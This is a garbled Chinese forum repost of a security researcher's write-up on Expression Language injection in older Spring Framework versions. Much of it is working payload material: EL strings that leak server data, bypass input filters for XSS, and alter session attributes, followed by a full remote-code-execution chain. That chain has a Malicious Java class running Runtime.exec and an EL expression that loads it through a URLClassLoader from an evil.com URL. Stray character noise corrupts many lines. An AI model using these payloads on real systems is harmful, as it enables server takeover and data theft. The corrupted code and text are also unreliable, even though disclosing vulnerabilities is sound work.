Remote Code with6 y/ a2 M1 P3 K/ O0 H7 Q
Expression Language Injection) r$ a/ E) o" B8 a: e
Spring Framework脆弱性—DanAmodio
0 p6 J: h5 _. Z1 `; W ^$ w全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中$ u- i3 q0 a, X/ R( v
可能会存在风险。
$ }: s+ j$ t4 K. o# L在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的9 O9 q2 z& ]# Y& C3 z
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
1 t' v; V# O2 p以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
, y7 t d3 m1 Z: K( A( }以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
# M& f: m# s6 h) _0 ~) N0 f) F版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。1 T: z$ B- F6 B. u$ I* Q
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但3 k! X, y) Y+ i8 D9 c
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版( r# t6 C/ X0 y" _0 \) C2 R
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。8 m6 ^5 {9 e/ a6 C/ j1 b
这些版本不支持禁用double EL resolution.
5 r' Y3 e% a2 N4 c2 f7 B这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含5 [/ h( I2 N- z9 I* V) R3 C
EL2.2容器上可能进行远程代码执行。
! Q. W. y; X8 z6 ?5 I! \这是一个原始信息泄露的攻击例子:
m. }4 J& j1 ?- q请求:
& ?' L3 C+ h0 }ttp://vulnerable.com/foo?message=${applicationScope}, H* @( Q. G! j# g) z8 O) P/ |
到达以下内容页面:! q- F X0 M0 f9 O& p+ J
结果将输出一些包含内部服务器信息calsspath 和本地工作目录: E" e4 d, y4 ^* Z# A$ L9 J
你也可以做一些其他事情,如这样:* O' Q" o4 d3 M4 N9 F
${9999+1}
4 \0 t' |; ~+ \4 y4 B2 J) Z% {4 }还可以访问session 对象和beans% w5 W6 [3 @7 _. h3 n9 L" s8 n
${employee.lastName}$ `, ?; @, {. J
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是# z- r7 l. r# O' V4 r0 A7 P
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
1 B3 j4 z$ h# s西,比如XSS.0 Q- E4 y; Y: U
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签$ [! b @; ?7 ^+ Q4 v# e
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
: z, _' e# L" V6 y- ]7 {呢?”1 E4 F! ]1 l# e7 e o$ n+ J0 T, H
因此,我尝试巳缦拢�, M: ]& k3 n) w/ \! @; I5 l- ^- p
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP9 n$ K! S: r% f2 y2 W2 ^4 z2 ~
P: h, W4 y% b8 T, g1 n. h& T3 T" G
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返8 I1 Q0 H, g$ ^7 ~( ?( o2 C, R, g
回的文本被插入进了spring:message 标签。8 t9 V% @& n& B7 w# [3 X- t
这里是一个最终绕过过滤的实例:* ~: [. A y5 ?. s
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
. A. e2 W, E3 C3 D# r9 V1 s0 t它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为: i/ E6 Q& l# O% @8 C
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?& c/ X0 Z0 x9 k5 I
经过一番研究,我学习到EL2.2 增加了方法调用。2 ?3 K- ~" w9 ?: c! ~5 h5 ]
我写了一个快速测试应用程序代码并且检测一些功能
7 S( H7 \' ], z" h${pageContext.request.getSession().setAttribute(“account”,”123456″)}. {+ X! t, A$ G# b
${pageContext.request.getSession().setAttribute(“admin”,true)}( T- G! a; G- }3 h; b
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的9 U3 `( e/ M) z: n
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?# z1 _6 I0 i$ N, w/ J% X
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
0 x# o" O) F. D; Y% ~8 [0 C6 w1 m“, 1234)}! L! ~$ `3 Q; W y, S
${“”.getClass().forName(“java.lang.Runtime”)}& `- [! L! |, W/ E. j/ _9 J
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
0 w; a1 q+ s7 `& i0 s% b, x- D可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函3 ~) f7 Q# e* S- O. n. y
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有* A0 o" r7 Q5 i, @
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于$ c' k0 L. k& V
方法签名invoke(Object obj, Object„ args)
0 B% E$ A8 x0 a3 \9 x9 OJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问2 g! U' C- Y# J& |( {+ m
题,以让它可以工作起来。) R+ K9 p2 Q, a4 u: L% Z5 h7 m! ~ b1 m
漏洞利用:9 [8 t; d3 u0 X) Y# `; Y5 Z
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
8 _# G" M, G3 l希望你们中的一些JAVA奇才告诉我我是如此的可笑。
% ~6 Y" C4 N/ E" V8 r* M; q( M这里有一些我试过的失败的用例,为了试图让它工作的用例:" H$ B' K- `' y, O* I$ ?- s2 f9 \
写文件到文件系统
* [% n6 Y: {+ Z5 f3 m' ? 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
9 [# M" u9 h$ w8 ~) m; E我认为这些可以很好的工作,但是我不能找到合适的类来载入。
4 p- X- u' u1 j' [' ?' L${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
, {' _' G+ p$ t/ Zjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:* n5 I2 ]( ?* ]1 \3 J0 U0 ~
org.springframework.expression.spel.standard.SpelExpressionParser not found
4 B& z' ^7 {, X: {8 r8 c tby
* K4 L% F! r9 Vorg.glassfish.web.javax.servlet.jsp [194].
, U: s0 {4 O" M 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public" h2 g$ F8 n& {1 q1 v; [
利用反射来创建一个新的Runtime(and watch the world burn)
: m9 @9 T2 O/ N1 h/ I0 l${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName* C# K9 ]- A5 x' d7 y
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}! g0 b1 E1 W/ s0 D
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
( o* Z- t) A" Z* P9 Y1 V/ x5 @ 使用java.lang.ProcessBuilder
8 Y- ^* x. i: I9 `1 E5 n0 r- X 用表达式语言来评估表达式语言
1 a0 S2 z( j& ^( ?: ?Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
2 ?9 X1 m6 ?# s4 P# m5 [! A${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request2 e5 l2 U5 B6 W& Q! ]7 F! b
“,”".getClass(),null)}
3 K1 [& d" i3 N. t1 H 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
: a! C, Q+ ^. x7 e我在使用一个空数组通过Method.invoke()时失败了很多次
$ J0 _( y3 C- \8 w% @“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
]% b9 d) q8 \7 P.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A+ |( `, I$ E, J* T
rrayList”).newInstance().toArray())
7 v1 {8 z9 S% V" N$ |java.lang.IllegalArgumentException: wrong number of arguments
! G. x1 L' m( r, ]& r4 {最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可7 e$ f, k7 s' u4 D1 |* [
以创建一个恶意class文件并且指向类装载器.
/ I# p! n+ O* s7 q% W' W% f L3 E我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
7 }" E7 Z% o. P7 Opublic class Malicious {
- g7 F( z: C( P4 }. i0 [3 O$ o3 qpublic Malicious() {, W/ I4 n- L& r m5 }( ~4 S+ v
try {( z1 Q3 R) v9 z B
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
) c# p( Z0 z. f \java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win& r% S+ Y7 u, v( O, @, ^9 _
} catch (Exception e) {3 K# |& s: c. V
}7 A$ Q( a5 R6 o
}
- T6 R: {! }' M我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回& J1 Y6 x7 E8 q3 P+ j
话中,因此它可以被使用.
: u7 ]$ Q3 h) F3 l+ Q${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName/ w2 C9 U+ h, y& k
(“java.util.ArrayList”).newInstance())}! v% Q3 x% Q" c. Z+ Q( C
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建9 Q* @3 a$ U, T$ [
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
5 e S7 i- p3 ~$ ~getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个; r' {& T: E8 r
我们可以调用的create(string)方法,然后转换对一个URL对象。
- p$ A; ~9 y3 x9 c${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
2 s% l* A }+ L! u- Y' @ere/malicious/classfile/is/located/”).toURL())}
" {! D; V2 K; Z2 {# v, L8 _ S( j3 \然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用," o, K- V- q2 E2 H# ]$ C! w7 [3 K7 X
恶意类文件被装载并创建,触发远程代码.
+ `/ R+ u2 A& F8 ?8 i/ R6 @( y' [${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte- x* ~$ B) S+ n! Y6 q# a' R# N% U
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
$ `+ n" s j& u, X+ wgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance) Q/ a2 c1 k% b) X1 P/ i
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对